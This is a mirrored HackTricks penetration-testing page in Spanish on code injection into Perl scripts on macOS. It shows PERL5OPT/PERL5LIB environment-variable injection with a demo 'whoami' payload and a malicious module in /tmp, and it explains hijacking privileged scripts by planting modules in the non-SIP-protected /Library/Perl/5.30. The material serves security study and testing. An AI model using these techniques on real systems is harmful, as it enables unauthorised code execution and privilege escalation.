mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-10 12:18:52 +00:00
91 lines
5.5 KiB
Markdown
91 lines
5.5 KiB
Markdown
# Inyección en Aplicaciones Perl de macOS
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? o ¿quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
|
|
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|
|
|
|
## A través de la variable de entorno `PERL5OPT` & `PERL5LIB`
|
|
|
|
Usando la variable de entorno PERL5OPT es posible hacer que perl ejecute comandos arbitrarios.\
|
|
Por ejemplo, crea este script:
|
|
|
|
{% code title="test.pl" %}
|
|
```perl
|
|
#!/usr/bin/perl
|
|
print "Hello from the Perl script!\n";
|
|
```
|
|
{% endcode %}
|
|
|
|
Ahora **exporta la variable de entorno** y ejecuta el script de **perl**:
|
|
```bash
|
|
export PERL5OPT='-Mwarnings;system("whoami")'
|
|
perl test.pl # This will execute "whoami"
|
|
```
|
|
Otra opción es crear un módulo Perl (por ejemplo, `/tmp/pmod.pm`):
|
|
|
|
{% code title="/tmp/pmod.pm" %}
|
|
```perl
|
|
#!/usr/bin/perl
|
|
package pmod;
|
|
system('whoami');
|
|
1; # Modules must return a true value
|
|
```
|
|
```markdown
|
|
{% endcode %}
|
|
|
|
Y luego utiliza las variables de entorno:
|
|
```
|
|
```bash
|
|
PERL5LIB=/tmp/ PERL5OPT=-Mpmod
|
|
```
|
|
## A través de las dependencias
|
|
|
|
Es posible listar el orden de las carpetas de dependencias de Perl en ejecución:
|
|
```bash
|
|
perl -e 'print join("\n", @INC)'
|
|
```
|
|
El cual devolverá algo como:
|
|
```bash
|
|
/Library/Perl/5.30/darwin-thread-multi-2level
|
|
/Library/Perl/5.30
|
|
/Network/Library/Perl/5.30/darwin-thread-multi-2level
|
|
/Network/Library/Perl/5.30
|
|
/Library/Perl/Updates/5.30.3
|
|
/System/Library/Perl/5.30/darwin-thread-multi-2level
|
|
/System/Library/Perl/5.30
|
|
/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
|
|
/System/Library/Perl/Extras/5.30
|
|
```
|
|
Algunas de las carpetas devueltas ni siquiera existen, sin embargo, **`/Library/Perl/5.30`** sí **existe**, **no** está **protegida** por **SIP** y está **antes** de las carpetas **protegidas por SIP**. Por lo tanto, alguien podría abusar de esa carpeta para agregar dependencias de scripts allí, de modo que un script Perl de alto privilegio las cargue.
|
|
|
|
{% hint style="warning" %}
|
|
Sin embargo, ten en cuenta que **necesitas ser root para escribir en esa carpeta** y hoy en día recibirás este **aviso de TCC**:
|
|
{% endhint %}
|
|
|
|
<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt="" width="244"><figcaption></figcaption></figure>
|
|
|
|
Por ejemplo, si un script está importando **`use File::Basename;`**, sería posible crear `/Library/Perl/5.30/File/Basename.pm` para hacer que ejecute código arbitrario.
|
|
|
|
## Referencias
|
|
|
|
* [https://www.youtube.com/watch?v=zxZesAN-TEk](https://www.youtube.com/watch?v=zxZesAN-TEk)
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver a tu **empresa anunciada en HackTricks**? o ¿quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
|
|
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|